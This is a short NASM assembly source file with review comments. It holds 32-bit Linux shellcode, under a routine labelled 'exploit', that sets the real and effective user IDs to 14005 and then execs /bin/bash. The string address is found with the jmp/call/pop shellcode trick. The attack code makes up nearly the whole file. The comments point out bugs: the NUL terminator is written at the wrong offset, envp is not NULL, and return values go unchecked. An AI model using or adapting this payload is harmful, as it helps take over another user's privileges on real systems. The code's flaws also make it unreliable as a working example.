
;-----------------------------------------------------------------------
; _start — 32-bit Linux (int 0x80) entry point.
; Performs setreuid32(14005, 14005) and then execve("/bin/bash", ...).
; Syntax: NASM, Intel operand order. No C runtime; no stack frame.
; The string is placed in .text after the code and its address is
; recovered with the call/pop trick (see `data:` below).
; Syscall ABI used here: eax = number, args in ebx, ecx, edx.
;-----------------------------------------------------------------------
global _start

_start:

jmp short data                  ; jump forward so `call exploit` can push the string address

exploit:

xor edx, edx                    ; edx = 0 (clobbered later by `pop edx`; see NOTE below)

xor eax, eax ; set reuid

xor ebx, ebx

xor ecx, ecx

mov al, 203                     ; 203 = setreuid32 on i386

mov bx, 14005                   ; ruid = 14005 (16-bit write; upper bits already zero from xor)

mov cx, 14005                   ; euid = 14005

int 0x80                        ; NOTE(review): return value in eax is not checked; a failed setreuid still falls through to execve

xor eax, eax

xor ebx, ebx

xor ecx, ecx                    ; ecx = 0 -> argv = NULL for execve

pop edx                         ; edx = address of `cmd` pushed by `call exploit`

mov [edx + 10], eax             ; stores 4 zero bytes at cmd+10..cmd+13
                                ; NOTE(review): '/bin/bash' is 9 bytes, so its terminator would be at offset 9,
                                ; which this store does not touch — confirm what byte follows `cmd` in the linked image.
                                ; NOTE(review): this writes into .text; it only works if the text segment is linked writable.

mov al, 11                      ; 11 = execve on i386

mov ebx, cmd                    ; ebx = path (absolute address, resolved at link time)

int 0x80                        ; NOTE(review): edx still holds the `cmd` address from `pop edx`, so envp is not NULL here;
                                ; the earlier `xor edx, edx` does not survive. Nothing runs after this on failure (no exit syscall).

data:

call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start

cmd: db '/bin/bash'             ; no explicit NUL terminator in the data itself (see NOTE at the store above)